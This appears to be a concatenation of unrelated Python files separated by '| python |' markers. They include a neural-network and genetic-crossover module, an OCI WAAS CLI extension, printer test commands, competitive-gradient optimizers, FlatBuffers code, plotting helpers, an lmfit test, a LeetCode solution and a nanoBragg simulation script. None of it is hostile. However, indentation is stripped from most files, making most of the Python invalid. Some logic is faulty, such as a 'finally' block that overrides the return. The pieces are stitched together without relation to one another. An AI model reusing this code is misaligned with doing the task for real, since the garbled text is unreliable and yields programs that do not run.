    # Recursively breeds every distinct pair of creatures (all-pairs crossover).
if len(creatures) < 2:
return []
offspring = []
p1 = creatures[0]
for p2 in creatures[1:]:
offspring.append(p1.breed(p2))
return offspring + breed(creatures[1:])
def cross(array1, array2):
assert(array1.shape == array2.shape)
new_list = []
a1, a2 = array1.flat, array2.flat
for i in range(array1.size):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_list.append(a1[i])
if r == 1:
# inherit from second parent
new_list.append(a2[i])
return np.array(new_list).reshape(array1.shape)
def cross2(array1, array2):
""" Cross function with whole genes instead of single nucleotides """
assert(array1.shape == array2.shape)
new_array = np.zeros_like(array1)
#a1, a2 = array1.flat, array2.flat
for i in range(array1.shape[1]):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_array[:,i] = array1[:,i].copy()
if r == 1:
# inherit from second parent
new_array[:,i] = array2[:,i].copy()
return new_array
def sigmoid(x):
return 1 / (1+np.exp(-x))
def tanh(x):
# Better than sigmoid for our purpose
return (np.exp(x)-np.exp(-x)) / (np.exp(x)+np.exp(-x))
def relu(x):
return np.maximum(x, np.zeros_like(x))
def sigmoid_derivative(x):
    # Expects x to already be a sigmoid output: if s = sigmoid(z), then ds/dz = s * (1 - s).
    return x*(1-x)
class NeuralNetwork:
activations = { "tanh": tanh,
"sigmoid": sigmoid,
"sigmoid_derivative": sigmoid_derivative,
"relu": relu}
def __init__(self):
self.save_state = False # Keep calculated values of neurons after feedforward for display purposes
def init_weights(self, layers):
self.weights = []
for i in range(len(layers)-1):
# Fill neural network with random values between -1 and 1
self.weights.append(np.random.uniform(size=(layers[i]+1, layers[i+1]), low=-1, high=1))
#def set_weights(self, weights):
# self.weights = weights
def set_activation(self, activation):
self.activation = activation.lower()
self.activation_f = self.activations[self.activation]
def get_layers(self):
""" Returns number of neurons in each layer (input and output layers included)
"""
n = len(self.weights)
return [len(self.weights[i])-1 for i in range(n)] + [len(self.weights[-1][0])]
def get_total_neurons(self):
layers = self.get_layers()
return sum(layers)
def get_total_synapses(self):
return sum([w.size for w in self.weights])
def feedforward(self, x):
self.output = np.array(x+[1.0]) # Add the bias unit
if self.save_state:
self.state = []
self.state.append(self.output.copy())
for i in range(0, len(self.weights)-1):
self.output = self.activation_f(np.dot(self.output, self.weights[i]))
self.output = np.append(self.output, 1.0) # Add the bias unit
if self.save_state:
self.state.append(self.output.copy())
self.output = self.activation_f(np.dot(self.output, self.weights[-1]))
if self.save_state:
self.state.append(self.output)
def copy(self):
new_nn = NeuralNetwork()
weights = []
for w in self.weights:
weights.append(w.copy())
new_nn.weights = weights
new_nn.set_activation(self.activation)
return new_nn
def compare_weights(self, other):
assert self.get_layers() == other.get_layers(), "neural network architectures are different"
diff = []
mutations = 0
for i in range(len(self.weights)):
diff.append(self.weights[i] == other.weights[i])
mutations += sum(self.weights[i] != other.weights[i])
print("{} mutation(s) ({}%)".format(mutations, mutations / self.get_total_synapses()))
return diff
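# Minimal usage sketch (the 3-4-2 architecture below is an arbitrary example):
if __name__ == '__main__':
    nn = NeuralNetwork()
    nn.init_weights([3, 4, 2])   # 3 inputs, one hidden layer of 4 units, 2 outputs
    nn.set_activation("tanh")
    nn.feedforward([0.5, -0.2, 0.1])
    print(nn.output)             # two activations in (-1, 1)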
| python |
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
import click
from services.waas.src.oci_cli_waas.generated import waas_cli
from oci_cli import cli_util
from oci_cli import custom_types # noqa: F401
from oci_cli import json_skeleton_utils
# oci waas purge-cache purge-cache --waas-policy-id, --resources
# to
# oci waas purge-cache --waas-policy-id, --resources
waas_cli.waas_root_group.commands.pop(waas_cli.purge_cache_group.name)
waas_cli.waas_root_group.add_command(waas_cli.purge_cache)
# oci waas custom-protection-rule-setting update-waas-policy-custom-protection-rules --update-custom-protection-rules-details, --waas-policy-id
# to
# oci waas custom-protection-rule update-setting --custom-protection-rules-details, --waas-policy-id
waas_cli.waas_root_group.commands.pop(waas_cli.custom_protection_rule_setting_group.name)
@cli_util.copy_params_from_generated_command(waas_cli.update_waas_policy_custom_protection_rules, params_to_exclude=['update_custom_protection_rules_details'])
@waas_cli.custom_protection_rule_group.command(name=cli_util.override('update_waas_policy_custom_protection_rules.command_name', 'update-setting'), help=waas_cli.update_waas_policy_custom_protection_rules.help)
@cli_util.option('--custom-protection-rules-details', required=True, type=custom_types.CLI_COMPLEX_TYPE, help=u"""""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'custom-protection-rules-details': {'module': 'waas', 'class': 'list[CustomProtectionRuleSetting]'}})
@cli_util.wrap_exceptions
def update_waas_policy_custom_protection_rules_extended(ctx, **kwargs):
if 'custom_protection_rules_details' in kwargs:
kwargs['update_custom_protection_rules_details'] = kwargs['custom_protection_rules_details']
kwargs.pop('custom_protection_rules_details')
ctx.invoke(waas_cli.update_waas_policy_custom_protection_rules, **kwargs)
# oci waas waas-policy-custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
# to
# oci waas waas-policy custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
waas_cli.waas_root_group.commands.pop(waas_cli.waas_policy_custom_protection_rule_group.name)
waas_cli.waas_policy_group.add_command(waas_cli.waas_policy_custom_protection_rule_group)
cli_util.rename_command(waas_cli.waas_policy_group, waas_cli.waas_policy_custom_protection_rule_group, "custom-protection-rule")
| python |
""""""
from SSNRoom import SSNRoom
import json
class WallRoom(SSNRoom):
def __init__(self, room):
super().__init__(room)
# self._load()
self.wall_store = None
def _load(self):
self.wall_store = json.loads(self.room.topic)
# room_events = self.room.get_events()
# events_ct = len(room_events)
# for i in range(0, events_ct):
# event = room_events.pop()
# if event['type'] == "m.room.message":
# text = event["content"]["body"]
# if "time_of_update" in text:
# wse = json.loads(event["content"]["body"])
# self.wall_store = wse
def get_wall_store(self):
return self.wall_store
| python |
# -*- coding: utf-8 -*-
#
# escpostools/commands/cmd_test.py
#
# Copyright 2018 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from escpostools.aliases import resolve_alias
from escpostools.cli import pass_context
LONG_RULER = '....:....|' * 8
SHORT_RULER = '....:....|' * 4
@click.command('test', short_help='Runs tests against implementations.')
@click.argument('aliases', type=click.STRING)
@click.option('--all', is_flag=True, help='Run all predefined test sets')
@click.option('--align', is_flag=True, help='Run predefined alignment test set')
@click.option('--modes', is_flag=True, help='Run predefined modes test set')
@click.option('--rulers', is_flag=True, help='Run predefined rulers test set')
@pass_context
def cli(ctx, aliases, all, align, modes, rulers):
"""Runs predefined tests against one or more implementations, sending sets
of commands to the printer(s) throught associated connection method(s).
For this command to work you must assign at least one alias with an
implementation and connection method. See help for "assign" command. For
example, if you want to run "modes" and "align" tests against an
implementation aliased as "tmt20" you type:
\b
$ escpos test tmt20 --align --modes
Or you can run all predefined tests against three aliased implementations:
\b
$ escpos test rm22,tmt20,dr700 --all
"""
impls = [resolve_alias(alias_id) for alias_id in aliases.split(',')]
if all:
align = True
modes = True
rulers = True
for impl in impls:
if align:
_run_align(impl)
if modes:
_run_modes(impl)
if rulers:
_run_rulers(impl)
def _run_align(impl):
impl.init()
impl.text('[Aligment Tests]')
impl.lf()
impl.justify_right()
impl.text('Right Aligned')
impl.justify_center()
impl.text('Centered Text')
impl.justify_left()
impl.text('Left Aligned')
impl.lf(2)
impl.text('This long text paragraph should be left aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_center()
impl.text('This long text paragraph should be centered. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_right()
impl.text('This long text paragraph should be right aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_left()
impl.lf(2)
def _run_modes(impl):
impl.init()
impl.text('[Modes]')
impl.lf()
impl.text('Just normal text.')
impl.lf()
impl.text('Entering condensed...')
impl.set_condensed(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_condensed(False)
impl.text('Condensed mode OFF')
impl.lf()
impl.text('Entering expanded...')
impl.set_expanded(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_expanded(False)
impl.text('Expanded mode OFF')
impl.lf(2)
def _run_rulers(impl):
impl.init()
impl.text('[Rulers]')
impl.lf()
impl.text(LONG_RULER)
impl.lf(2)
impl.set_condensed(True)
impl.text(LONG_RULER)
impl.set_condensed(False)
impl.lf(2)
impl.set_expanded(True)
impl.text(SHORT_RULER)
impl.set_expanded(False)
impl.lf(2)
| python |
# This is a preliminary version of the code
from typing import Any
import time
import torch
import numpy
from torch import Tensor
from torch import autograd
from torch.autograd import Variable
from torch.autograd import grad
def hessian_vec(grad_vec, var, retain_graph=False):
v = torch.ones_like(var)
vec, = autograd.grad(grad_vec, var, grad_outputs=v, allow_unused=True, retain_graph=retain_graph)
return vec
def hessian(grad_vec, var, retain_graph=False):
v = torch.eye(var.shape[0])
matrix = torch.cat([autograd.grad(grad_vec, var, grad_outputs=v_row, allow_unused=True, retain_graph=retain_graph)[0]
for v_row in v])
matrix = matrix.view(-1,var.shape[0])
return matrix
class Richardson(object):
def __init__(self, matrix, rhs, tol, maxiter, relaxation, verbose=False):
"""
:param matrix: coefficient matrix
:param rhs: right hand side
:param tol: tolerance for stopping criterion based on the relative residual
:param maxiter: maximum number of iterations
:param relaxation: relaxation parameter for Richardson
        :param verbose: if True, print convergence information
:return: matrix ** -1 * rhs
"""
self.rhs = rhs
self.matrix = matrix
self.tol = tol
self.maxiter = maxiter
self.relaxation = relaxation
self.rhs_norm = torch.norm(rhs, 2)
self.iteration_count = 0
self.verbose = verbose
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, initial_guess):
residual = self.rhs - self.matrix @ initial_guess
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
solution = initial_guess
while relative_residual_norm > self.tol and self.iteration_count < self.maxiter:
## TODO: consider making all of these non-attributes and just return them
solution = solution + self.relaxation * residual
residual = self.rhs - torch.matmul(self.matrix, solution)
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
self.iteration_count += 1
self.print_verbose("Richardson converged in ", str(self.iteration_count), " iteration with relative residual norm: ",
str(relative_residual_norm), end='...')
return solution
"""
class Optimizer:
def __init__(self, iteration, tolerance, device="cpu"):
self.iter = iteration
self.tol = tolerance
self.dev = torch.device(device)
def solve(self):
raise NotImplementedError
class SpecialOptimizer(Optimizer):
def __init__(self, *args, **kwargs):
iteration, tolerance = args[:]
device = kwargs.get("device", "cpu")
super(SpecialOptimizer, self).__init__(iteration, tolerance, device=device)
## do something with args and kwargs ...
def solve(self):
pass
"""
class ConjugateGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-18, lr=1.0, verbose=True):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_eval = f(x, y)
g_eval = g(x, y)
grad_f_x = autograd.grad(f_eval, x, create_graph=True, allow_unused=True)
grad_g_y = autograd.grad(g_eval, y, create_graph=True, allow_unused=True)
new_x = x - self.lr * grad_f_x[0]
new_y = y - self.lr * grad_g_y[0]
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val = f(x, y)
g_val = g(x, y)
grad_f_x, = autograd.grad(f_val, x, create_graph=True, allow_unused=True)
grad_g_y, = autograd.grad(g_val, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy = hessian_vec(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian_vec(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
# The "*" multiplication operates elementwise
# We have to use the "*" and not the matmul method because we do NOT extract the entire Hessian matrix, we just
# extract the diagonal entries
#__x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_f_xy, __hess_g_yx))
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_f_xy * hess_g_yx)
#__y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_g_yx, __hess_f_xy))
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_g_yx * hess_f_xy)
else:
hess_f_xy = hessian(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_f_xy, hess_g_yx)
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_g_yx, hess_f_xy)
solver1 = Richardson(x_A, x_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_x = torch.randn(x_rhs.shape)
delta_x = solver1.solve(initial_guess_x)
solver2 = Richardson(y_A, y_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_y = torch.randn(y_rhs.shape)
delta_y = solver2.solve(initial_guess_y)
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy:", hess_f_xy)
self.print_verbose("hess_g_yx:", hess_g_yx)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradientJacobi(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y, delay=1):
x_buffer = []
y_buffer = []
f_history = []
g_history = []
x_history = []
y_history = []
prev_y = y.clone().detach().requires_grad_(True)
prev_x = x.clone().detach().requires_grad_(True)
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val_x = f(x, prev_y)
f_val_y = f(prev_x, y)
g_val_x = g(x, prev_y)
g_val_y = g(prev_x, y)
grad_f_x_x, = autograd.grad(f_val_x, x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_f_x_y, = autograd.grad(f_val_y, prev_x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_g_y_x, = autograd.grad(g_val_x, prev_y, create_graph=True, allow_unused=True)
grad_g_y_y, = autograd.grad(g_val_y, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy_x = hessian_vec(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian_vec(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian_vec(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian_vec(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * hess_f_xy_x * grad_g_y_x)
delta_y = -self.lr * (grad_g_y_y + 2 * hess_g_yx_y * grad_f_x_y)
else:
hess_f_xy_x = hessian(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * torch.matmul(hess_f_xy_x, grad_g_y_x))
delta_y = -self.lr * (grad_g_y_y + 2 * torch.matmul(hess_g_yx_y, grad_f_x_y))
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
x_buffer.append(x)
y_buffer.append(y)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy_x:", hess_f_xy_x)
self.print_verbose("hess_f_xy_y:", hess_f_xy_y)
self.print_verbose("hess_g_yx_x:", hess_g_yx_x)
self.print_verbose("hess_g_yx_y:", hess_g_yx_y)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
if self.iter_count > delay:
prev_y = y_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
prev_x = x_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
return f_history, g_history, x_history, y_history
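# Minimal usage sketch (hypothetical objectives, not part of the original module):
# solve a bilinear zero-sum game f(x, y) = x*y, g = -f with a short run.
# x0 = torch.tensor([1.0], requires_grad=True)
# y0 = torch.tensor([1.0], requires_grad=True)
# solver = CompetitiveGradientJacobi(nsteps=50, lr=1e-2, verbose=False)
# f_hist, g_hist, xs, ys = solver.solve(lambda x, y: (x * y).sum(),
#                                       lambda x, y: -(x * y).sum(), x0, y0)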
| python |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: DeepSeaScene
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class SubpassDependency(object):
__slots__ = ['_tab']
@classmethod
def SizeOf(cls):
return 28
# SubpassDependency
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# SubpassDependency
def SrcSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0))
# SubpassDependency
def SrcStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(4))
# SubpassDependency
def SrcAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# SubpassDependency
def DstSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(12))
# SubpassDependency
def DstStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16))
# SubpassDependency
def DstAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(20))
# SubpassDependency
def RegionDependency(self): return self._tab.Get(flatbuffers.number_types.BoolFlags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(24))
def CreateSubpassDependency(builder, srcSubpass, srcStages, srcAccess, dstSubpass, dstStages, dstAccess, regionDependency):
builder.Prep(4, 28)
builder.Pad(3)
builder.PrependBool(regionDependency)
builder.PrependUint32(dstAccess)
builder.PrependUint32(dstStages)
builder.PrependUint32(dstSubpass)
builder.PrependUint32(srcAccess)
builder.PrependUint32(srcStages)
builder.PrependUint32(srcSubpass)
return builder.Offset()
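# Usage sketch (assumed standard FlatBuffers struct access, not part of this
# generated file): a SubpassDependency is read in place from its parent buffer.
# dep = SubpassDependency()
# dep.Init(buf, pos)  # buf/pos are assumed to come from the parent table's accessor
# src, dst = dep.SrcSubpass(), dep.DstSubpass()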
| python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_selection import mutual_info_classif
def draw_cat_plot(df: pd.DataFrame, id_var: str, cat_feats: list, *, output_filename: str = None):
"""
Draw plot showing value counts of categorical features.
:parameter df: pandas dataframe containing the feature `id_var` and all of the features in `cat_feats`.
Note: this implementation does not check that all of the relevant features are in `df`.
:parameter id_var: Feature name (string) with respect to which panels of the categorical plot
are made. For instance, for a binary feature, the plot will
have two panels showing the respective counts of categorical features.
:parameter cat_feats: list of strings of categorical features to plot.
:parameter output_filename: if the plot is to be saved, this is its name.
(default=None, i.e., plot is not saved)
:return: Seaborn figure object.
"""
# Build the long-format DataFrame for the cat plot with `pd.melt`, keeping only the categorical features
df_cat = pd.melt(df, id_vars=id_var, value_vars=cat_feats)
# Draw the catplot
fig = sns.catplot(x="variable", hue="value", col=id_var, data=df_cat,
kind="count")
fig.set_xlabels('')
fig.set_xticklabels(rotation=90)
if output_filename is not None:
fig.savefig(output_filename)
return fig
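# Usage sketch (hypothetical column names, assuming a binary target column 'cardio'):
# fig = draw_cat_plot(df, id_var='cardio', cat_feats=['smoke', 'alco', 'active'],
#                     output_filename='catplot.png')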
def draw_corr_matrix(df: pd.DataFrame):
"""
- Draw correlation matrix as heatmap.
- Draw correlation for target feature and mutual information in a bar plot.
Note: Assuming the target feature is in the last column of df.
:parameter df: pandas dataframe with all of the relevant features as columns.
:return: fig: matplotlib figure object;
corr: correlation matrix for all features;
scores: pandas dataframe with the correlation and mutual information scores
for the target feature.
"""
target = df.columns[-1]
corr = df.corr() # Calculate the correlation matrix
target_corr = corr.loc[target, corr.columns.delete(-1)] # Correlation for the target
mi = mutual_info_classif(df.iloc[:, :-1], df[target]) # Calculate MI score
scores = target_corr.to_frame()
scores.rename(columns={target: "Corr"}, inplace=True)
scores["MI"] = mi
scores_melted = pd.melt(scores, ignore_index=False)
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True # Generate a mask for the upper triangle
fig, ax = plt.subplots(2, 1, figsize=(8, 15), dpi=100)
sns.heatmap(corr, mask=mask, square=True, ax=ax[0], cmap='Spectral_r',
annot=True, fmt='.2f', annot_kws={'fontsize': 8})
ax[0].set_title("Feature Correlation", fontdict={"fontsize": 14})
# Plot the "Cardio" correlation and mutual information scores on the sme graph.
sns.barplot(x="value", y=scores_melted.index, hue="variable",
data=scores_melted, ax=ax[1], palette='crest')
# sns.barplot(x=[np.array(cardio_corr), mi], y=cardio_corr.index, ax=ax[1],
# color=[0.30, 0.41, 0.29]) # to plot just the "Cardio" correlation scores
ax[1].set_title(f"Target ({target}) Correlation and Mutual Information",
fontdict={"fontsize": 14})
ax[1].set_xlabel(None)
ax[1].legend(title=None)
ax[1].grid(axis='x')
fig.savefig('Corr_matrix_Target.png')
return fig, corr, scores
| python |
import numpy as np
from lmfit import Parameters, minimize, report_fit
from lmfit.models import LinearModel, GaussianModel
from lmfit.lineshapes import gaussian
def per_iteration(pars, iter, resid, *args, **kws):
"""iteration callback, will abort at iteration 23
"""
# print( iter, ', '.join(["%s=%.4f" % (p.name, p.value) for p in pars.values()]))
return iter == 23
def test_itercb():
x = np.linspace(0, 20, 401)
y = gaussian(x, amplitude=24.56, center=7.6543, sigma=1.23)
y = y - .20*x + 3.333 + np.random.normal(scale=0.23, size=len(x))
mod = GaussianModel(prefix='peak_') + LinearModel(prefix='bkg_')
pars = mod.make_params(peak_amplitude=21.0,
peak_center=7.0,
peak_sigma=2.0,
bkg_intercept=2,
bkg_slope=0.0)
out = mod.fit(y, pars, x=x, iter_cb=per_iteration)
assert(out.nfev == 23)
assert(out.aborted)
assert(not out.errorbars)
assert(not out.success)
| python |
from typing import List
class Solution:
def maximum69Number(self, num: int) -> int:
ls = list('%d' % num)
ans = 0
try:
index = ls.index('6')  # digits are characters, so search for '6', not 6
ls[index] = '9'
for it in ls:
ans = ans * 10 + int(it)
return ans
except ValueError:
# no '6' in the number: it is already maximal
ans = num
finally:
return ans
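if __name__ == '__main__':
# Quick sanity check: flipping the most significant '6' to '9' maximizes the value.
print(Solution().maximum69Number(9669))  # expected 9969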
| python |
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex # import dependency
from simtbx.nanoBragg import shapetype
from simtbx.nanoBragg import convention
from simtbx.nanoBragg import nanoBragg
import libtbx.load_env # possibly implicit
from cctbx import crystal
import os
# allow command-line options
GOFAST = False
import sys
if len(sys.argv)>1:
if sys.argv[1] == "fast":
print("SPEEDING UP! ")
GOFAST = True
# get the structure factor of spots
mtzfile = "model_nophase.mtz"
stolfile = "./bg.stol"
imgfile = "./F4_0_00008.mccd.gz"
# get stuff from the web if we have to
if not os.path.isfile(mtzfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+mtzfile
urllib.request.urlretrieve(url, mtzfile)
if not os.path.isfile(stolfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/bg.stol"
urllib.request.urlretrieve(url, stolfile)
if not os.path.isfile(imgfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+imgfile
urllib.request.urlretrieve(url, imgfile)
# make sure we got everything we need
assert os.path.isfile(mtzfile)
assert os.path.isfile(stolfile)
assert os.path.isfile(imgfile)
# read in structure factor amplitudes
from iotbx.reflection_file_reader import any_reflection_file
mtz_file = any_reflection_file(mtzfile)
Fhkl = mtz_file.as_miller_arrays()[0]
# get the structure factors of the background
Fbg_vs_stol = []
with open(stolfile, "rb") as fp:
for i in fp.readlines():
tmp = i.split(" ")
try:
Fbg_vs_stol.append((float(tmp[0]), float(tmp[1])))
except Exception:pass
# now Fbg_vs_stol is a list of stol,Fbg tuples
# open the existing diffraction image: we need it for the background profile
import dxtbx
img = dxtbx.load(imgfile)
panel = img.get_detector()[0]
pixel_size_mm = panel.get_pixel_size()[0]
distance_mm = panel.get_distance()
#beam_center_mm =
# create the simulation
SIM = nanoBragg(img.get_detector(),img.get_beam(),verbose=6)
#SIM = nanoBragg(detpixels_slowfast=(4096,4096),pixel_size_mm=0.079346,verbose=9)
SIM.Fhkl = Fhkl
SIM.Fbg_vs_stol = Fbg_vs_stol
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
#from IPython import embed
#embed()
blarg = SIM.Fbg_vs_stol
blarg[1] = (0,0)
SIM.Fbg_vs_stol = blarg
print(SIM.Fbg_vs_stol[1])
# sigh, just keep going...
#exit()
print("beam_center_mm=",SIM.beam_center_mm)
print("XDS_ORGXY=",SIM.XDS_ORGXY)
print("detector_pivot=",SIM.detector_pivot)
print("beamcenter_convention=",SIM.beamcenter_convention)
print("fdet_vector=",SIM.fdet_vector)
print("sdet_vector=",SIM.sdet_vector)
print("odet_vector=",SIM.odet_vector)
print("beam_vector=",SIM.beam_vector)
print("polar_vector=",SIM.polar_vector)
print("spindle_axis=",SIM.spindle_axis)
print("twotheta_axis=",SIM.twotheta_axis)
print("distance_meters=",SIM.distance_meters)
print("distance_mm=",SIM.distance_mm)
print("close_distance_mm=",SIM.close_distance_mm)
print("detector_twotheta_deg=",SIM.detector_twotheta_deg)
print("detsize_fastslow_mm=",SIM.detsize_fastslow_mm)
print("detpixels_fastslow=",SIM.detpixels_fastslow)
print("detector_rot_deg=",SIM.detector_rot_deg)
print("curved_detector=",SIM.curved_detector)
print("pixel_size_mm=",SIM.pixel_size_mm)
print("point_pixel=",SIM.point_pixel)
print("polarization=",SIM.polarization)
print("nopolar=",SIM.nopolar)
print("oversample=",SIM.oversample)
print("region_of_interest=",SIM.region_of_interest)
print("wavelength_A=",SIM.wavelength_A)
print("energy_eV=",SIM.energy_eV)
print("fluence=",SIM.fluence)
print("flux=",SIM.flux)
print("exposure_s=",SIM.exposure_s)
print("beamsize_mm=",SIM.beamsize_mm)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divsteps_hv=",SIM.divsteps_hv)
print("divstep_hv_mrad=",SIM.divstep_hv_mrad)
print("round_div=",SIM.round_div)
print("phi_deg=",SIM.phi_deg)
print("osc_deg=",SIM.osc_deg)
print("phisteps=",SIM.phisteps)
print("phistep_deg=",SIM.phistep_deg)
print("detector_thick_mm=",SIM.detector_thick_mm)
print("detector_thicksteps=",SIM.detector_thicksteps)
